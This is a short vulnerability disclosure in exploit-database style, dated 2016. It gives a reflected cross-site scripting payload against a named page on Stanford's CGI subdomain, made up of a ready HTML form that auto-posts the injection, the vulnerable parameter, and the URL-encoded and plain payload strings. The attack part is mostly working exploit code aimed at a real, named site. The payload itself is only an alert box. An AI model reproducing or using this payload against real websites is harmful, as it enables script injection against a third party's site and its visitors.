/***********************************************************************************
** Exploit Title: Stanford CGI Cross Site Scripting Vulnerability
**
** Exploit Author:  Sha4yan
**
** Vendor Homepage : http://cgi.stanford.edu/
**
** Google Dork: none
**
** Date: 2016-01-08
**
** Tested on: Ubuntu / Mozila Firefox
**
************************************************************************************
** Exploit Code:
******************

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST" 
action="http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>

************************************************************************************
Location & Vulnerable query:
******************

http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=

Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

*************************************************************************************
** Proof:
******************

Executable script tag in Stanford's Cgi Subdomain own page:

Exploit : "><script>alert(/xss/)</script>

Exploit query:
http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E


******************************************************************************************
** Persian Underground GateWay
******************************************************************************************